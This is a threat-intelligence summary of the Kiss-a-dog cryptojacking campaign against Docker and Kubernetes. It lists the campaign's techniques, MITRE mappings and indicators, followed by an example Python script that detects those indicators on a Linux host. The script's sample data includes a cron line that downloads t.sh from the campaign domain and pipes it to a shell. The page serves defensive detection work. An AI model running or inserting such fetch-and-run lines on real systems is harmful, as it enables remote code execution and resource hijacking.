New Kiss-a-dog Cryptojacking Campaign Targets Docker and Kubernetes

CrowdStrike tracks a new cryptojacking campaign, Kiss-a-dog, targeting vulnerable Docker and Kubernetes infrastructure using an obscured domain, container escape attempts, and anonymized mining pools. The operation uses multiple C2 servers, user- and kernel-mode rootkits, backdoored containers, lateral movement, and persistence mechanisms to mine cryptocurrency. hashtags #Kiss-a-dog #XMRig

Keypoints

  • The Kiss-a-dog campaign targets vulnerable Docker and Kubernetes infrastructure, using a domain that is obscured in the payload and anonymized mining pools.
  • The operation relies on container escape attempts, backdoored containers, and lateral movement to persist and expand within the environment.
  • The initial entry point decodes a Base64 payload, downloads t.sh from kiss.a-dog.top, installs curl, and schedules a malicious payload as a cron job.
  • The domain kiss.a-dog.top is obscured in the payload and resolved via DNS before subsequent payloads are fetched from the C2 server.
  • Kiss-a-dog uses the Diamorphine (kernel-mode) and libprocesshider (user-mode, LD_PRELOAD) rootkits to hide its processes and evade detection.
  • XMRig mining is deployed disguised as cmake; the pools are hosted on love.a-dog.top and touch.a-dog.top, which hides the attackers' wallet addresses from the mining configuration.
  • The campaign performs network reconnaissance with pnscan, masscan, and zgrab to identify vulnerable Redis and Docker instances, and uses Redis as a backdoor.

MITRE Techniques

  • [T1027] Obfuscated Files or Information – The entry point payload is Base64 encoded and decoded at runtime: "…after Base64 decode."
  • [T1071.004] Application Layer Protocol: DNS – The obscured domain is resolved via DNS before the first payload is downloaded: "Successful DNS query" is shown.
  • [T1053.003] Scheduled Task/Job: Cron – The malicious payload is added as a cron job to achieve persistence: "…adds a malicious payload as a cron job."
  • [T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking – The campaign uses LD_PRELOAD (via /etc/ld.so.preload) to inject malicious shared libraries into every process: "…inject malicious shared libraries into every process spawned…"
  • [T1014] Rootkit – Diamorphine and libprocesshider are used to hide the mining process from user space: "…Diamorphine rootkit… and libprocesshider rootkit to hide the process…"
  • [T1105] Ingress Tool Transfer – t.sh and later-stage payloads are downloaded from the C2 server after DNS resolution of the obscured domain.
  • [T1046] Network Service Discovery – pnscan, masscan, and zgrab scan internet IP ranges to find vulnerable Docker/Redis instances: "…download and compile network-scanning tools like pnscan, masscan and zgrab…"
  • [T1496] Resource Hijacking – XMRig is used to mine cryptocurrency on compromised containers: "…XMRig, a popular mining software, to mine the cryptocurrency."
  • [T1611] Escape to Host – Container escape via a host mount, enabling lateral movement and persistence on the underlying node: "…host mount to escape from the container."

Indicators of Compromise

  • [Domain] kiss.a-dog.top – hosts the initial payloads; DNS resolution of this domain precedes the payload download.
  • [Domain] love.a-dog.top, touch.a-dog.top – pool domains used for mining.
  • [File] t.sh – malicious payload downloaded from kiss.a-dog.top and executed.
  • [File] diamorphin.ko – Diamorphine kernel module rootkit loaded on the host.
  • [File] cmake.service – disguised systemd service used to run the mining binary.
  • [File] XMRig (mining software) – disguised as cmake and configured to mine via the pool servers.
  • [File] XMRig pool configuration files referencing love.a-dog.top and touch.a-dog.top.
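The indicators above map onto a handful of host artifacts: cron entries (often carrying a Base64 blob that hides the domain), /etc/ld.so.preload (where libprocesshider is registered), the loaded kernel module list, and the systemd unit list. The following script, added here as an example and not code from the CrowdStrike report or the campaign, sweeps those artifacts for the IOCs on this page. The artifact names used as dictionary keys and the sample contents are constructed for the example; on a real host you would read /etc/crontab and /var/spool/cron, /etc/ld.so.preload, and the output of lsmod and systemctl list-unit-files into the same dictionary.

```python
"""Sweep Linux host artifacts for Kiss-a-dog indicators (example, not CrowdStrike code)."""
import base64
import re
from dataclasses import dataclass

# Indicators taken from the page: pool/C2 domains, dropped files, rootkit module.
IOC_DOMAIN_RE = re.compile(r"\b(?:kiss|love|touch)\.a-dog\.top\b")
IOC_FILE_RE = re.compile(r"\b(?:t\.sh|cmake\.service|diamorphin\S*\.ko|libprocesshider\S*\.so)\b")
IOC_MODULE_PREFIX = "diamorphin"
# A run of Base64 alphabet long enough to be a command rather than a word (T1027).
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


@dataclass(frozen=True)
class Finding:
    source: str     # which artifact the hit came from
    indicator: str  # what matched, e.g. "domain:kiss.a-dog.top"
    evidence: str   # the offending line, truncated


def _decoded_blobs(line):
    """Yield text decodings of Base64 tokens in a line, so IOCs hidden behind
    'echo <b64> | base64 -d | sh' are still visible to the regexes."""
    for tok in B64_RE.findall(line):
        try:
            out = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not real Base64 (e.g. a long path) or not text
        if all(c.isprintable() or c in "\n\t" for c in out):
            yield out


def scan_text(source, text):
    """Match domain and file IOCs against each line and its decoded Base64 payloads."""
    findings = []
    for line in text.splitlines():
        for cand in [line, *_decoded_blobs(line)]:
            for rx, label in ((IOC_DOMAIN_RE, "domain"), (IOC_FILE_RE, "file")):
                for m in rx.finditer(cand):
                    findings.append(Finding(source, f"{label}:{m.group(0)}", line[:80]))
    return findings


def scan_ld_preload(source, text):
    """/etc/ld.so.preload is empty or absent on a healthy host; every entry is
    a library forced into all processes (T1574.006) and deserves review."""
    return [Finding(source, f"ld_preload:{ln.strip()}", ln.strip()[:80])
            for ln in text.splitlines() if ln.strip() and not ln.startswith("#")]


def scan_lsmod(source, text):
    """Flag a loaded Diamorphine module by name (first column of lsmod, header skipped)."""
    findings = []
    for line in text.splitlines()[1:]:
        cols = line.split()
        if cols and cols[0].startswith(IOC_MODULE_PREFIX):
            findings.append(Finding(source, f"module:{cols[0]}", line[:80]))
    return findings


def scan_host(artifacts):
    """artifacts maps an artifact name (path or command) to its text content."""
    findings = []
    for source, text in artifacts.items():
        findings.extend(scan_text(source, text))
        if source.endswith("ld.so.preload"):
            findings.extend(scan_ld_preload(source, text))
        if source == "lsmod":
            findings.extend(scan_lsmod(source, text))
    return findings


# Constructed sample artifacts mimicking the artifacts described on this page.
_B64_DROPPER = base64.b64encode(b"curl -fsSL http://kiss.a-dog.top/t.sh | sh").decode()
SAMPLE_ARTIFACTS = {
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        f"*/30 * * * * root echo {_B64_DROPPER} | base64 -d | sh\n"
    ),
    "/etc/ld.so.preload": "/usr/local/lib/libprocesshider.so\n",
    "lsmod": "Module                  Size  Used by\n"
             "xt_conntrack           16384  1\n"
             "diamorphin             20480  0\n",
    "systemctl list-unit-files": "cron.service enabled\ncmake.service enabled\n",
}

if __name__ == "__main__":
    for f in scan_host(SAMPLE_ARTIFACTS):
        print(f"{f.source:28} {f.indicator:48} {f.evidence}")
```

The Base64 decoding step is what makes the cron check useful: the raw crontab line contains neither the domain nor t.sh, and a grep for the indicators alone would miss it. The ld.so.preload check intentionally reports every entry, not just libprocesshider, since a process-hiding library can be renamed freely while the preload mechanism itself cannot be hidden from a file read.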

Read more: https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/